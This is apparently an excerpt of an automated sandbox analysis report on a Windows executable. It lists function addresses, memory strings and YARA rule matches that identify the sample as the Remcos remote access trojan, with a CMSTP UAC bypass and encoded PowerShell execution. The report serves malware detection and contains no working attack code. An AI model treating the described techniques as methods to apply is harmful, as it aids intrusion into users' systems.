                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_0041F0FA0_2_0041F0FA
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_004541590_2_00454159
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_004381680_2_00438168
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_004461F00_2_004461F0
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_0043E2FB0_2_0043E2FB
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_0045332B0_2_0045332B
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_0042739D0_2_0042739D
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_004374E60_2_004374E6
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_0043E5580_2_0043E558
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_004387700_2_00438770
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_004378FE0_2_004378FE
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_004339460_2_00433946
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_0044D9C90_2_0044D9C9
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_00427A460_2_00427A46
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_0041DB620_2_0041DB62
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_00427BAF0_2_00427BAF
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_00437D330_2_00437D33
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_00435E5E0_2_00435E5E
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_00426E0E0_2_00426E0E
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_0043DE9D0_2_0043DE9D
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_00413FCA0_2_00413FCA
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_00436FEA0_2_00436FEA
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_100171940_2_10017194
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_1000B5C10_2_1000B5C1
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 4_2_0044B0404_2_0044B040
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 4_2_0043610D4_2_0043610D
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 4_2_004473104_2_00447310
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 4_2_0044A4904_2_0044A490
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 4_2_0040755A4_2_0040755A
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 4_2_0043C5604_2_0043C560
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 4_2_0044B6104_2_0044B610
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 4_2_0044D6C04_2_0044D6C0
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 4_2_004476F04_2_004476F0
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 4_2_0044B8704_2_0044B870
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 4_2_0044081D4_2_0044081D
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 4_2_004149574_2_00414957
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 4_2_004079EE4_2_004079EE
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 4_2_00407AEB4_2_00407AEB
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 4_2_0044AA804_2_0044AA80
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 4_2_00412AA94_2_00412AA9
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 4_2_00404B744_2_00404B74
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 4_2_00404B034_2_00404B03
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 4_2_0044BBD84_2_0044BBD8
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 4_2_00404BE54_2_00404BE5
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 4_2_00404C764_2_00404C76
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 4_2_00415CFE4_2_00415CFE
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 4_2_00416D724_2_00416D72
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 4_2_00446D304_2_00446D30
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 4_2_00446D8B4_2_00446D8B
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 4_2_00406E8F4_2_00406E8F
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 5_2_004050385_2_00405038
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 5_2_0041208C5_2_0041208C
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 5_2_004050A95_2_004050A9
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 5_2_0040511A5_2_0040511A
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 5_2_0043C13A5_2_0043C13A
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 5_2_004051AB5_2_004051AB
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 5_2_004493005_2_00449300
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 5_2_0040D3225_2_0040D322
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 5_2_0044A4F05_2_0044A4F0
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 5_2_0043A5AB5_2_0043A5AB
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 5_2_004136315_2_00413631
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 5_2_004466905_2_00446690
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 5_2_0044A7305_2_0044A730
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 5_2_004398D85_2_004398D8
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 5_2_004498E05_2_004498E0
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 5_2_0044A8865_2_0044A886
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 5_2_0043DA095_2_0043DA09
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 5_2_00438D5E5_2_00438D5E
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 5_2_00449ED05_2_00449ED0
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 5_2_0041FE835_2_0041FE83
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 5_2_00430F545_2_00430F54
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 6_2_004050C26_2_004050C2
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 6_2_004014AB6_2_004014AB
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 6_2_004051336_2_00405133
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 6_2_004051A46_2_004051A4
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 6_2_004012466_2_00401246
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 6_2_0040CA466_2_0040CA46
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 6_2_004052356_2_00405235
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 6_2_004032C86_2_004032C8
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 6_2_004222D96_2_004222D9
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 6_2_004016896_2_00401689
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 6_2_00402F606_2_00402F60
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: String function: 00434E10 appears 54 times
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: String function: 004169A7 appears 87 times
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: String function: 004165FF appears 35 times
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: String function: 00422297 appears 42 times
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: String function: 00402093 appears 50 times
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: String function: 00434770 appears 42 times
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: String function: 0044DB70 appears 41 times
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: String function: 00401E65 appears 34 times
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: String function: 00444B5A appears 37 times
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: String function: 00413025 appears 79 times
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: String function: 00416760 appears 69 times
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000003.2169570412.000000000076F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000002.4555963712.000000000382B000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000003.2198421779.0000000000801000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000003.2150758432.00000000007E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe.mui` vs 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000003.2150758432.00000000007E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000003.2170663657.0000000000801000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000003.2170134516.0000000000760000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeBinary or memory string: OriginalFileName vs 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeBinary or memory string: OriginalFilename vs 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000006.00000002.2174707883.000000000041B000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, type: SAMPLEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, type: SAMPLEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: amsi32_2064.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: amsi32_5644.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: 0.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 0.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 0.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 4.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 4.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 4.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 5.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 5.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 0.2.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 5.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 0.2.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 0.2.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 6.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 6.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
